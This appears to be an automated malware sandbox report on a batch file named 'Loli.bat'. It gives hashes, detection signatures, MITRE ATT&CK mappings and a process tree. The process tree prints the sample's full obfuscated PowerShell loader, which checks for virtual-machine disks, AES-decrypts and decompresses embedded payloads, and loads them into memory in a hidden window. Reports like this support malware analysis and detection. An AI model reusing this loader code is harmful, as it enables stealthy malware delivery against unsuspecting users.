adf4074b727b1f4914e3d1bd154f5d8672d16688960a77d4262e2c620cf7f890

General

Target

Loli.bat
Size

7.2MB
MD5

b052451fc18d2a15c1d83312b55d09a3
SHA1

81ed7f80a894ceaca01153920d3b5e73f593d6a5
SHA256

adf4074b727b1f4914e3d1bd154f5d8672d16688960a77d4262e2c620cf7f890
SHA512

9102cea466aa291c2df1a4f2d69d4cfe71ef7c7dd048f17719757ed317e80b192337894d59c04fdb95c9c92fc1b0568f2049960ee927bc66d6b421e089a8a659
SSDEEP

49152:zHRDNbQ4h2m6rQA3V8VxkTxV824RWYDQhM84IU6ZGnxb6szVaeB8bOYxs4ztgyUv:F

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1932	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1932	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1932	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2668 wrote to memory of 1444	2668	cmd.exe	31
PID 2668 wrote to memory of 1444	2668	cmd.exe	31
PID 2668 wrote to memory of 1444	2668	cmd.exe	31
PID 2668 wrote to memory of 2396	2668	cmd.exe	32
PID 2668 wrote to memory of 2396	2668	cmd.exe	32
PID 2668 wrote to memory of 2396	2668	cmd.exe	32
PID 2668 wrote to memory of 2512	2668	cmd.exe	33
PID 2668 wrote to memory of 2512	2668	cmd.exe	33
PID 2668 wrote to memory of 2512	2668	cmd.exe	33
PID 2668 wrote to memory of 1932	2668	cmd.exe	34
PID 2668 wrote to memory of 1932	2668	cmd.exe	34
PID 2668 wrote to memory of 1932	2668	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2668
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:1444
- C:\Windows\system32\findstr.exe
  findstr /i /c:"WDS100T2B0A" /c:"QEMU HARDDISK" /c:"DADY HARDDISK"
  2⤵
  PID:2396
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function OaEd($Lhlb){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$KNIa=[zYSzYyzYszYtzYezYmzY.zYSezYcuzYrzYizYtyzY.zYCzYrzYypzYtzYozYgrzYazYphzYyzY.zYAzYezYszY]:zY:zYCzYrezYazYtezY()zY;'.Replace('zY', ''); Invoke-Expression -WarningAction Inquire -Debug -Verbose '$KNIa.MLWoLWdLWeLW=LW[LWSLWyLWstLWemLW.LWSLWecLWuLWrLWiLWtyLW.LWCLWryLWpLWtoLWgLWrLWaLWpLWhLWy.LWCLWiLWphLWeLWrMLWodLWeLW]:LW:LWCBLWCLW;'.Replace('LW', ''); Invoke-Expression -WarningAction Inquire -Verbose '$KNIa.PHaaHadHadHaiHanHagHa=Ha[SHaysHatHaeHam.HaSHaeHacHaurHaiHatHay.HaCHaryHapHatHaoHagHarHaapHahHayHa.PHaaHaddHainHagHaMoHadHae]Ha:Ha:HaPHaKHaCSHa7;'.Replace('Ha', ''); Invoke-Expression -InformationAction Ignore '$KNIa.KxUexUyxU=xU[xUSxUyxUsxUtexUm.xUCxUoxUnvxUexUrxUtxU]:xU:xUFxUroxUmxUBaxUsxUexU6xU4xUSxUtrxUixUnxUg("FxUbxUbxU4xUmxUoxUUxUOxUGPxUwrxUfxUQxUh1xUrxUlxUKxUcCxUhxUoxUPLxU/xUZxxUnxUsxUMxUmxU4xU6exUixUVxUmVxUrxUjcxU4=xU");'.Replace('xU', ''); Invoke-Expression -Debug '$KNIa.IVBVVB=VB[VBSVByVBsVBtVBemVB.CVBoVBnVBveVBrVBtVB]VB::VBFVBrVBomVBBVBasVBeVB6VB4VBSVBtVBriVBnVBg("lVBlVBuVBFVB/VBpVBeVBMVB9IVBfDVBMVBVVB3oVBHVBUVB3VBC5VBgVB=VB=");'.Replace('VB', ''); $xPYT=$KNIa.CreateDecryptor(); $BQvO=$xPYT.TransformFinalBlock($Lhlb, 0, $Lhlb.Length); $xPYT.Dispose(); $KNIa.Dispose(); $BQvO;}function OkiP($Lhlb){ Invoke-Expression -InformationAction Ignore -Verbose '$ZKQY=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm(,$Lhlb);'.Replace('cd', ''); Invoke-Expression -InformationAction Ignore '$SIsz=Ncdecdwcd-cdOcdbcdjcdecdctcd Scdycdscdtecdmcd.cdIcdO.cdMcdecdmocdrcdyScdtcdrcdecdacdm;'.Replace('cd', ''); Invoke-Expression -Debug -InformationAction Ignore '$Cswx=Nbnebnwbn-bnObnbbnjbnebnctbn Sbnybnsbntebnmbn.bnIbnO.bnCbnobnmpbnrbnesbnsbnibnobnnbn.bnGZbnibnpbnStbnrbneabnm($ZKQY, [bnIbnObn.bnCbnobnmbnpbnrebnssbnibnobnn.bnCbnobnmbnprbnebnsbnsibnobnnMbnobndbnebn]bn:bn:Dbnebncbnombnpbnrebnssbn);'.Replace('bn', ''); $Cswx.CopyTo($SIsz); $Cswx.Dispose(); $ZKQY.Dispose(); $SIsz.Dispose(); $SIsz.ToArray();}function xNUW($Lhlb,$PBcK){ Invoke-Expression -WarningAction Inquire '$ibma=[WNSWNyWNsWNtWNeWNmWN.WNReWNflWNeWNcWNtiWNoWNnWN.WNAsWNsWNeWNmbWNlWNy]WN:WN:WNLWNoWNaWNd([byte[]]$Lhlb);'.Replace('WN', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$mOyP=$ibma.EdXndXtdXrdXydXPdXodXidXntdX;'.Replace('dX', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$mOyP.IFIIFnIFvIFoIFkIFeIF(IF$nIFulIFlIF, $PBcK);'.Replace('IF', '');}$apiD = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $apiD;$fTnD=[System.IO.File]::ReadAllText($apiD).Split([Environment]::NewLine);foreach ($kbxa in $fTnD) { if ($kbxa.StartsWith('dzqCD')) { $XAms=$kbxa.Substring(5); break; }}$JuAS=[string[]]$XAms.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$wKg = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore '$qzk = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$LwB = OkiP (OaEd ([PdCPdoPdnPdvPdePdrPdtPd]:Pd:FPdrPdoPdmBPdaPdsPdePd64PdSPdtPdriPdnPdg($JuAS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Pd', '');xNUW $wKg $null;xNUW $qzk $null;xNUW $LwB (,[string[]] (''));
  2⤵
  PID:2512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1932-4-0x000007FEF641E000-0x000007FEF641F000-memory.dmp

Filesize
4KB

Download
memory/1932-5-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/1932-7-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/1932-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
memory/1932-8-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/1932-9-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/1932-10-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/1932-11-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/1932-12-0x000007FEF641E000-0x000007FEF641F000-memory.dmp

Filesize
4KB

Download
memory/1932-13-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing